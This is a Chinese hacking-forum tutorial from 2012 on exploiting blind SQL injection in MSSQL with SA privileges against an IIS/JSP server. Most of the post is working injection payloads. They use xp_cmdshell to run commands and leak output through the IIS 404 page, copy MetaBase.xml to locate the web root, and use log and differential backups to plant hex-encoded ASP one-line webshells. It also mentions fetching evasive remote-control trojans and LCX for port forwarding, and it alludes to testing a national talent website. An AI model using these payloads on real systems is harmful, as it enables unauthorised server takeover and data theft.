找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 sa权限的教程.
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2127|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————1 O* H( i) h: y$ ^7 L0 C. F
" X' u4 r, o6 p8 c  h9 U( f4 Z7 f
. v! H6 B2 h4 T9 G# n) {* }
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
' I+ q$ S' h# S0 t1 s) I4 g* d$ U+ A& y
                                                                 7 ~# l" h( A* X
                                                                 ; w  b' Y" q! _& L  h3 g
                                                                  论坛: http://www.90team.net/! J6 U" D0 \) b% M

; L' W' R: y7 T1 U; M; {" P2 G' `
; Q% Y) p7 _1 b& w. L* N4 O' M
友情检测国家人才网4 c/ m6 |$ r  m" n( P/ j1 Z

& X9 r8 x; Z. S5 u& K) A/ N! ]  _8 b/ W8 j/ I6 J
内容:MSSQL注入SA权限不显错模式下的入侵& W5 X0 r$ h2 N& r3 {) R

7 R! u) ?( E' ?. T- Z9 B0 J. }" m) g% U# B2 \) J" P: f9 F
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。" Q( H7 o8 e" p% B( C# j

& d7 d9 n( e1 k6 V我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
" I6 f! e% L* H4 j: U* E
& C8 ~- n2 C& I  E9 f7 A7 w* Q/ Q% D  k) N
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
5 M4 K* h, T* X4 f6 x; m5 t1 ^& h7 l+ `* b  H
思路:
- d3 [$ t/ e9 H9 B$ S
9 h$ ^1 u3 k5 _0 o8 d- o2 d$ _首先:# N0 n: V* y. h6 m. v. X

, Y/ J( \5 d/ k通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
. c4 L1 Z' j8 v/ \& X. `! {3 }9 Z- ^2 z$ V& e, s. j& O3 b6 x* ]
1.日志备份获得Webshell3 Y% |, b: f& p

% x% c3 M( j4 F/ x7 P' f1 a4 a2.数据库差异备份获得Webshell: u4 M) a6 i) M
. N2 _9 O- Z: n- `) W
4.直接下载免杀远控木马。) O* Q7 g* D+ c# M  ]
/ G/ u: b7 X( m* O3 H2 }
5.直接下载LCX将服务器端口转发出来
1 V  }; ?6 _& y/ z' U' Q1 f
* g- O: K' e3 I6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
! g  d# S. q3 O- p
- M1 U- Q. b: _/ N2 f% M" b! v" p9 Z% m  r; k7 l, l
3 o% S" [4 S+ z% j% h1 k& t. Q0 {- E
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, 6 f' W! k2 Q1 p0 D/ t$ b3 G

% c% ^' T- [4 d7 ^我直接演示后面一个方法+ M( ?2 C% J# S! \  m
- N  Y* v2 s0 l' Y& F1 o  H

: v7 A0 w1 s: Y  b' o& T分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL ! P6 b3 R6 T! f+ b
1 l+ E5 A: U9 V( i# ^# w+ F0 b. z
- x) j  }9 @7 F1 i6 `
  y; l( v  i9 b/ _

6 t; n" l; Y/ K; M5 `◆日志备份:4 G% i4 g: [: s7 D

5 x  `* P4 P- \
* I- Z2 }0 z2 O# h& H1. 进行初始备份- s  j$ v" S' t5 a' _: P9 v9 F! C
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
0 d7 u& {! h4 w. Q
5 |/ D/ \7 i2 G4 ?  B2. 插入数据
; A, b- C* D8 B8 {5 y1 e;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--( n: O! x7 ~) q2 u

7 n" c7 {) v& \' N7 j0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>" V4 \7 i# w* r
  
2 H) v. t2 R  N3 Z) b% C! ]3. 备份并获得文件,删除临时表
$ i) m! D' ]1 @6 p* l! T;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--* y% j; B1 h, B% b/ t) G$ f

$ j: R8 F/ w6 C/ o3 x2 v: x8 |) s6 d
4 y' e& C% P, n' n& |8 p
; w9 Q. O: @  q6 ]# ^  u& ]◆数据库差异备份( H5 D9 y) X5 z; n! u
  X" p) I. ]# ~7 T$ Y! H1 w8 _! f+ |  T
(1. 进行差异备份准备工作
, i4 ~! _$ I; Z5 j* E
2 V6 {" h8 L) @' ~# x8 l- X;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
" h1 |: t. R5 M) b- v' V
) r$ K1 r7 q) M' `9 d5 ~上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
$ J/ L1 w+ w/ U) {; ^; O . ?4 q# Y9 c2 _, S, p
' l! P# \, h" J% Z- B  N
(2. 将数据写入到数据库+ S/ G1 h- w- H( G
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- # H0 p& ?/ V8 i! E) g5 K2 o3 M
, b) @/ T1 D% H; d
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>+ n2 N- N$ u7 ^. v# O
) s% F6 c" g! y  }0 N8 O
3. 备份数据库并清理临时文件$ Z* W2 h1 G  T7 u

" P* D/ F) W2 r8 R2 x# B" \;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--7 z/ O8 D: f, A4 @+ b& h
3 P0 U  L" V  P: U0 T( h' K
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
0 A% |9 L& l: m0 D+ u  p' l/ |# Z3 c. t) ^$ \# y& c+ J9 L" K
4 s- E$ M$ j! F' o8 O

& q+ m* d- N/ w5 u1 ?用^转义字符来写ASP(一句话木马)文件的方法:   ; X& w  `& {8 B$ O8 H# ~

9 ~# b5 N# y0 _1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
6 L6 x* \8 D" O, g# k" x$ w, i- p- Z* E6 U1 A& G9 R0 F7 g3 A
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp ; x6 r! q0 b  l6 ~- H

1 S9 M; h6 P  c( H' i  h读取IIS配置信息获取web路径9 B4 e' P# Y# v$ J, @
) C; [/ I3 g6 u; v$ R( L
     5 Y7 W+ {1 `# s, j' p' j2 q. O
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
2 |" D5 h9 E. T0 B- j$ q- }0 F( }5 d
执行命令
7 i! t7 [1 t1 U/ h6 G     
3 r  h+ x. k5 y     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--6 o' f0 j2 a5 C* z

1 q3 D5 r, ?  l; R/ {: U6 ^0 H& r2 u% m4 g! t* S
$ W, ?8 K/ n7 ^, f
0 G5 j4 n" ^9 v. f! ^
7 {6 Z  r/ m' Y2 h+ m! I' u

# \- W) s0 W0 \, a# O) z4 x* g, o8 V5 k
! A5 ]4 g% k$ |3 w% w/ n

! {" E% n6 k% s& M- P4 J8 F6 E2 [! t6 V- s( }2 F6 \  u

6 h: u  [, z2 C+ S# G- h3 U7 j3 p. Y" G1 t
6 v; c% o* R( y7 A& E- s* _

+ _6 L8 W9 c8 ~0 N$ L
5 p" n/ W' s( e8 f- x$ l0 m9 n5 }! f& E
, d) s, A4 Z2 X; D

' ~0 z, [! Y& t. p! a$ K0 E* W6 R) b; @; i* v
- j! N  E$ {$ b( T( Q( a& p1 y9 w, t
" I4 w. C, J+ J. Y" J6 q- G

9 `6 m# V- M1 l) O6 `
! V* j6 {1 K* l8 n9 m
: C9 G( \0 L9 ~8 }% \+ u- A+ U& o3 C9 m/ g4 I

. I/ K  @% i1 {4 P! g" r' b' X! \: i7 S8 l3 B+ [
. q  e2 \( ^! s% a( w3 Z$ c

# Z/ t6 F' G/ g3 D$ I7 K. q
( w7 t# c  i, v0 S3 `" ^! X
" G  {! P, Z/ b3 j  b' B' I# y3 u

1 j1 `5 w6 p, e- y/ F* l# `4 n5 ]6 r6 E2 G  l+ g9 E" L0 T& r
( K, y. G0 T: T; Q: S0 V

  ~# _$ F% J5 [7 ~- ^* u3 z& R+ R6 y" A% r& x( X1 P- t3 u% W: A% V9 P
1 [0 v, m1 u. c2 y$ u. c0 N+ e+ ]! k, _

: ?' L0 p! a8 h8 `+ r0 W, g
$ O4 \; V$ m& ~7 \) c5 m% q; P" S  }$ k: B6 ?$ [, |; g

( L* D0 M4 Z0 p/ b: z% a
) L" f% c9 P0 f  Q0 r
4 N+ j) ^" o% J& b1 n) J6 D
- ?8 b" s& u7 V, w: @# X0 h  f! j2 C; j. Z$ i
8 e4 h* c0 x* z" ?  }
4 w* J  ?* a  K8 o- C1 ]; g
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表